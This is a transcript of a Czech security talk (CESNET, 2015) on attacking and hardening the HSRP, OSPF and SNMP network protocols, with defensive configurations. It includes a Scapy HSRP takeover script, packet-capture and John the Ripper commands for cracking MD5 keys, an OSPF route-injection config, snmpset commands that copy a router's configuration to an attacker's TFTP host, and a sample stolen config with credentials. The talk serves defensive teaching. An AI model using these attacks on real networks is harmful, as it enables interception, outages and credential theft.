Zabezpečení síťových protokolů

Transkript

Zabezpečení síťových protokolů
Zabezpečení síťových protokolů
Michal Kostěnec
CESNET, z. s. p. o.
9. 5. 2015
1
Obsah
●
Úvod
–
–
●
Zabezpečení protokolů uvnitř sítě
–
–
–
–
●
Význam bezpečnosti uvnitř sítě
Vnitřní vs vnější
Krátce teorie o funkci protokolu
Dostupné druhy zabezpečení
Popis útoku
HSRP, OSPF a SNMP
Zajímavost z praxe v 2014
9. 5. 2015
2
Bezpečnost uvnitř sítě
●
Složitější ochrana než před útoky z Internetu
–
Povaha útoků se může lišit
●
–
Různé kategorie sítě
●
●
–
Klientské (portsecurity, DHCP snooping, DAI, IPSG,
storm-control)
Serverové (FW, FHRP, mgmt rozhraní)
Neočekávané (nepříjemné) vlastnosti
●
●
9. 5. 2015
Přibývá L2 komunikace
OS
Síťových prvků
3
HSRP
●
Rodina protokolů FHRP
–
HSRP (Cisco proprietární), VRRP, GLBP
●
Poskytují redundanci pro next-hop (def. gw)
●
Aktivní sledování stavu HSRP routeru
●
●
–
Pravidelné HELLO zprávy
–
Hello – 3s
–
Hold-time – 10s
V případě výpadku další router s nejvyšší prioritou
převezme roli gw
Virtuální IP a MAC
9. 5. 2015
4
HSRP fáze
9. 5. 2015
5
Použití HSRP
●
●
Nejčastěji v serverové podsíti
–
Zajištění max redundance GW
–
Bezvýpadková změna aktivního směrovače
–
Podpora 2+ participujících směrovačů
–
Možnost „load-balancingu“
Méně časté v klientské síti
–
●
Sítě s vysokou prioritou
Spojení 2 active/active párů
9. 5. 2015
–
FW + směrovač
6
Naše síť s HSRP
9. 5. 2015
7
HSRP & Cisco
9. 5. 2015
8
HSRP zprávy
9. 5. 2015
9
Druhy autentizace HSRP
●
●
●
Bez autentizace
–
Výchozí stav
–
Autentizační řetězec – cisco (viz hello paket)
Plaintext autentizace
–
Vlastně žádná změna
–
Není autentizace, pouze jako ochrana při chybné
konfiguraci
MD5 autentizace
9. 5. 2015
–
Vytváří se HMAC zprávy
–
Integrita obsahu a autenticita odesílatele
10
Útok na HSRP
9. 5. 2015
11
Útok na HSRP
●
Vysíláme pravidelně pakety s parametry pro získání
pozice aktivního směrovače
–
Cíl je vyhrazená multicastová skupina
–
Priorita 0-255, čili 255;-)
–
Potenciálně vyšší IP než jsou „pravé“ směrovače
●
MITM nebo DoS
●
Jaký je rozdíl mezi (na co si dávat pozor)
9. 5. 2015
–
Fyzicky v lokální síti
–
Vzdáleně na kompromitovaném stroji
12
Útok prakticky
●
Scapy
–
Generování, dekódování a manipulace s pakety
ip = IP(src='10.10.10.101', dst='224.0.0.2')
udp = UDP()
hsrp = HSRP(group=10,
priority=255,
virtualIP='10.10.10.1',
auth='Vlan10!')
send(ip/udp/hsrp, iface='eth0', inter=3, loop=1)
>>> ip/udp/hsrp
<IP frag=0 proto=udp src=10.10.10.101 dst=224.0.0.2 |
<UDP sport=1985 dport=1985 |
<HSRP
|>>>
9. 5. 2015
priority=255 group=10 auth='Vlan10!' virtualIP=10.10.10.1
13
Co budeme dělat s MD5?
●
●
Útok identický, jen potřebujeme „klíč“
–
Online Bruteforce
–
Offline bruteforce
Nahrání komunikace na lokální síti
tcpdump -i eth0 -n dst host 224.0.0.2 -s0 -w /tmp/hsrp.pcap
●
Vyparsování dat pro offline bruteforcing (MagnumRipper)
pcap2john.py hsrp.pcap > hsrp.john
●
Bruteforcing (JtR)
john hsrp.john
9. 5. 2015
14
HSRP summary
●
Používat MD5 autentizaci
●
Používat dostatečne silný(dlouhý) klíč
●
Případně použít ACL
–
Pouze vyjmenované HSRP směrovače
ip access-list extended ACL_HSRP_ROUTER
permit udp host 10.10.10.3 eq 1985 any eq 1985
deny udp any eq 1985 any eq 1985 log
permit ip any any
9. 5. 2015
15
OSPFv2 (dále OSPF)
●
Open Shortest Path First
●
Nejpoužívanější dynamický směrovací protokol
–
Hierarchické dělení sítě
●
●
9. 5. 2015
Oblasti (informace se vyměňují uvnitř oblasti, tzv.
area)
Hraniční směrovače pro výměnu zpráv mezi oblastmi
–
Hello zprávy v krátkém intervalu (rychlá
konvergence)
–
Dijkstrův algoritmus (rychlost linky)
–
Loadbalancing (cesty se stejnou „cenou“)
–
Autentizace
16
Druhy autentizace
●
●
Shodné jako u HSRP
–
Jen se nedělá HMAC, ale pouze MD5 klíče
–
Draft na SHA256 HMAC
Bez autentizace
–
●
●
Výchozí stav
Plaintext autentizace
–
Vlastně žádná změna
–
Není autentizace, pouze jako ochrana při chybné
konfiguraci
MD5 autentizace
9. 5. 2015
17
(NE)Použití OSPF
●
●
Pro páteřní sítě s rychlou konvergencí
–
Řádově jednotky sekund dle nastavení
–
Robustní díky hierarchii
–
Náročnější na CPU
Klientské sítě
–
●
Není důvod, spíše chyba v konfiguraci
Serverové sítě
9. 5. 2015
–
Virtuální směrovače (CSR 1000V)
–
Anycast DNS, ...
18
Naše síť s OSPF
9. 5. 2015
19
OSPF podmínky sousedství
●
●
Musí se shodovat
–
Síť a maska na lince
–
Oblast (Area) + její typ
–
Hello + Dead časy
–
MTU (kontrolu lze vypnout)
–
Autentizace
Nesmí se shodovat
–
9. 5. 2015
Router-id (označení směrovače)
20
Route injection
●
Navázání sousedsví
–
Problém při autentizaci
●
MITM nebo DoS
●
Injektování routy
–
Lokální síť (příliš složité)
●
–
Vzdálená síť/IP
●
●
Quagga
9. 5. 2015
PROČ?
Např. 8.8.8.8
Int Lo1
Ip address 8.8.8.8 255.255.255.255
Router ospf 1
Network 8.8.8.8 0.0.0.0 area 0
21
Kde zjistíme potřebné parametry
9. 5. 2015
22
Ilustrace útoku na OSPF
9. 5. 2015
23
Útok na OSPF prakticky
●
Uvažujme kompromitaci serveru
–
Do sítě jsou posílány HELLO zprávy pro DNS
Anycast server
–
Zjistíme potřebné parametry pro sousedství
●
–
Navážeme sousedství
–
Injektujeme routu
●
●
●
Wireshark, tcpdump, tshark, …
0.0.0.0/0 je riskantní
Nejlépe /32
Při použité autentizaci
–
9. 5. 2015
Získání dat a bruteforce
24
OSPF hello s autentizací
9. 5. 2015
25
OSPF s MD5 autentizací
●
Postup téměř identický jako u HSRP
●
Nahrání komunikace na lokální síti
tcpdump -i eth0 -n dst host 224.0.0.5 -s0 -w /tmp/ospf.pcap
●
Vyparsování dat pro offline bruteforcing (ettercap > v0.8.1)
ettercap -Tqr ospf.pcap > ospf.john
●
Bruteforcing (JtR)
john ospf.john
9. 5. 2015
26
OSPF summary
●
Používat MD5 autentizaci
●
Používat dostatečne silný(dlouhý) klíč
●
Passive-interface default
–
No passive-interface Vlan10
●
Sousedé explicitně přes unicast
●
Filtrování přijímaných prefixů
ip prefix-list DNS_ANYCAST_IN seq 5 permit 10.3.3.3/32
router ospf 1
distribute-list prefix DNS_ANYCAST_IN in Vlan10
9. 5. 2015
27
SNMP
●
Simple Network Management Protocol
●
Základní protokol pro dohled/správu sítě
●
Základní pojmy
–
Manager (Server)
●
–
Agent (SW na zařízení)
●
●
–
GET/SET požadavky (RO vs RW community)
GET/SET odpovědi
TRAPy (nevyžádané SNMP zprávy)
„Community“
●
Lze chápat jako heslo (pouze v1 - v2c)
Hierarchický jménný systém OID
●
9. 5. 2015
–
Pro snadnější práci MIB tabulky
28
MIB tabulka
9. 5. 2015
29
SNMP II.
●
●
●
Verze 1
–
původní verze
–
Nepodporuje 64bit čítače
Verze 2c
–
Nové metody pro čtení dat
–
Autentizace jen dle „community“
–
Nejpoužívanější v součastnosti
Verze 3
–
9. 5. 2015
Autentizace a šifrování
30
Cisco konfigurace SNMP
snmp-server community $emestralk4. RO
snmp-server community read.write!C0mmunity RW
snmp-server trap-source Loopback0
snmp-server location NTK, Velky sal - XX,XX420
snmp-server contact Michal Kostenec,
[email protected],
+420 111 222 333
snmp-server host 10.50.10.3 webtrap
snmp-server enable traps cpu threshold
9. 5. 2015
31
Průzkum prostředí při RO
●
Hledání zranitelností
–
Neoprávněný přístup
–
Eskalace práv
–
DoS
iso.3.6.1.2.1.1.1.0 = STRING: "Cisco IOS Software, C3900 Software
(C3900-UNIVERSALK9-M), 15.2(4)M5, RELEASE SOFTWARE (fc2)“
CVE-2014-3359
An attacker could exploit this vulnerability by sending malformed DHCPv6
packets to be processed by an affected device. An exploit could allow the
attacker to cause a memory leak and eventual reload of an affected device.
9. 5. 2015
32
Průzkum prostředí při RO
●
Zjišťování topologie sítě
–
Popis portů
–
Vlany
–
Připojená zařízení
iso.3.6.1.2.1.31.1.1.1.18.10008 = STRING: "SWT Testovaci podsit“
iso.3.6.1.2.1.31.1.1.1.1.10008 = STRING: "Fa0/8"
iso.3.6.1.4.1.9.9.68.1.2.2.1.2.10008 = INTEGER: 10
iso.3.6.1.2.1.17.1.4.1.2.9 = INTEGER: 10008
iso.1.3.6.1.2.1.17.4.3.1.2.0.0.12.7.172.8 = 9
iso.3.6.1.2.1.17.4.3.1.1.0.0.12.7.172.8 = Hex-STRING: 00 00 0C 07 AC 08
iso.3.6.1.2.1.4.22.1.2.430.10.10.101.10 = Hex-STRING: 00 00 0C 07 AC 08
9. 5. 2015
33
Zajímavosti při RW community
●
Možnost nastavení položky s možností zápisu
●
Stažení konfigurace :-)
–
Hesla, sdílená tajemství, další zajímavá konfigurace
snmpset -c community -v 2c 10.10.10.2
1.3.6.1.4.1.9.9.96.1.1.1.1.2.336 i 1 (tftp)
snmpset -c community -v 2c 10.10.10.2
1.3.6.1.4.1.9.9.96.1.1.1.1.3.336 i 4 (runningConfig)
snmpset -c community -v 2c 10.10.10.2
1.3.6.1.4.1.9.9.96.1.1.1.1.4.336 i 1 (networkFile)
snmpset -c community -v 2c 10.10.10.2
1.3.6.1.4.1.9.9.96.1.1.1.1.5.336 a 10.10.10.101 (dstIP)
snmpset -c community -v 2c 10.10.10.2
1.3.6.1.4.1.9.9.96.1.1.1.1.6.336 s R1-config.conf (filename)
snmpset -c community -v 2c 10.10.10.2
1.3.6.1.4.1.9.9.96.1.1.1.1.14.336 i 1 (active)
9. 5. 2015
34
Stažená konfigurace
enable secret 4 xPC5koYEZRbDek6EF24RmwY.I8z87NNt7erVl7DxBH.
username admin privilege 15 secret 5 $1$lVFH$x7vloxy4oaT9jvrNt0jGn/
aaa group server tacacs+ tac_admin
server 10.100.1.20
server 10.200.1.20
tacacs-server key 7 25010A3C560F3C067C1C16174115
archive
path tftp://10.100.1.13/backup/sw101-config
line con 0
password 7 06025C2B41171D49
line vty 0 4
access-class management-access-v4 in
password 0 SuperTajneHeslo.908
ip access-list standard management-access-v4
permit 10.99.1.0 0.0.0.255
9. 5.permit
2015
10.100.1.0 0.0.0.255
35
Summary SNMP
●
Nejvhodnější je v3 (autentizace, šifrování)
–
Používá se spíše v2
●
„Community“, které nelze uhádnout hrubou silou
●
Nepoužívat RW „community“, pokud není nutné
●
Omezit přístup na vyjmenované IP rozsahy
ip access-list standard management-access-v4
permit 10.99.1.0 0.0.0.255
deny
any log
snmp-server community $emestralk4. RO management-access-v4
9. 5. 2015
36
Praxe 2014: Duplicitní IP
●
Tiskárna a posléze WIN hlásí duplicitní IP
●
Řízený přístup k síti
●
–
Pouze registrovaná zařízení (DHCP)
–
DHCP snooping, DAI, IPSG
Problém na různých VLANách
9. 5. 2015
37
Praxe 2014: Duplicitní IP
●
●
Nová úžasná funkce
–
IP Device Tracking (IPDT)
–
The main IPDT task is to keep track of connected
hosts (association of MAC and IP address). In
order to do this, it sends unicast Address
Resolution Protocol (ARP) probes with a default
interval of 30 seconds
Použití
9. 5. 2015
–
Web-based authentication
–
Auth-proxy
–
Flexible netflow
–
Cisco TrustSec (CTS)
–
...
38
Praxe 2014: Duplicitní IP
show ip device tracking all
IP Device Tracking = Enabled
IP Device Tracking Probe Count = 3
IP Device Tracking Probe Interval = 30
IP Device Tracking Probe Delay Interval = 0
-----------------------------------------------------------IP Address MAC Address
Vlan Interface
STATE
-----------------------------------------------------------10.10.0.20
a820.661b.b384 10 GigabitEthernet0/1 INACTIVE
9. 5. 2015
39
Dotazy
?
? ?
9. 5. 2015
40

Podobné dokumenty

Spínače a přepínače

Spínače a přepínače celý bílý, kolébka s popisem 0-I červená prosvícená kolébka zelená prosvícená kolébka černý, kolébka s popisem I-0-II monostabilní, černý bez popisu

Více

ROZHODNUTÍ RADY 2008/616/SVV ze dne 23. června 2008 o

ROZHODNUTÍ RADY 2008/616/SVV ze dne 23. června 2008 o 1. Pokud nebyla při vyhledávání pomocí neidentifikovaného profilu DNA ve vnitrostátní databázi nalezena žádná shoda nebo byla nalezena shoda s neidentifikovaným profilem DNA, může být tento neident...

Více

Technická specifikace připojení zákaznického

Technická specifikace připojení zákaznického software bidges, např. zařízením br v operačním systému Linux. Před připojením je nutné tento protokol vypnout, popř. na hardwarovém switchi odfiltrovat. Storm control Na portech je nakonfigurován ...

Více

CCNA Exploration - Směrování, koncepce a protokoly

CCNA Exploration - Směrování, koncepce a protokoly konzolový port – pro počáteční konfiguraci – není to síťové rozhraní – síť nemusí být v okamžiku připojení nakonfigurována

Více

ZÁŘÍ 2008 - Obec Kadov

ZÁŘÍ 2008 - Obec Kadov lidé v širokém okolí, byl lidový dudák Josef Smitka, známý pod jménem Pepíček z Čečelouc či Pepík Dudákouc. Lidé dodnes vzpomínají na jeho dobrodružný život. Po vyučení v Rakousku procestoval Franc...

Více

PKO-vypisky ke zkousce

PKO-vypisky ke zkousce zdrojové a (nebo) cílové adresy, zdrojového a (nebo) cílového portu. Překlad může být buď statický nebo dynamický. NAT se označuje také jako Maškaráda(Masquerade). NAT je vysvětlený na slidu 33 – v...

Více

Učební texty Datové sítě V

Učební texty Datové sítě V Konfigurace autentizačních mechanismů PPP:  Uživatelským jménem je hostitelský název vzdáleného směrovače  Hesla obou směrovačů musí být stejná a nešifrovaná (Pozor! Shift key sensitive!)  Pro š...

Více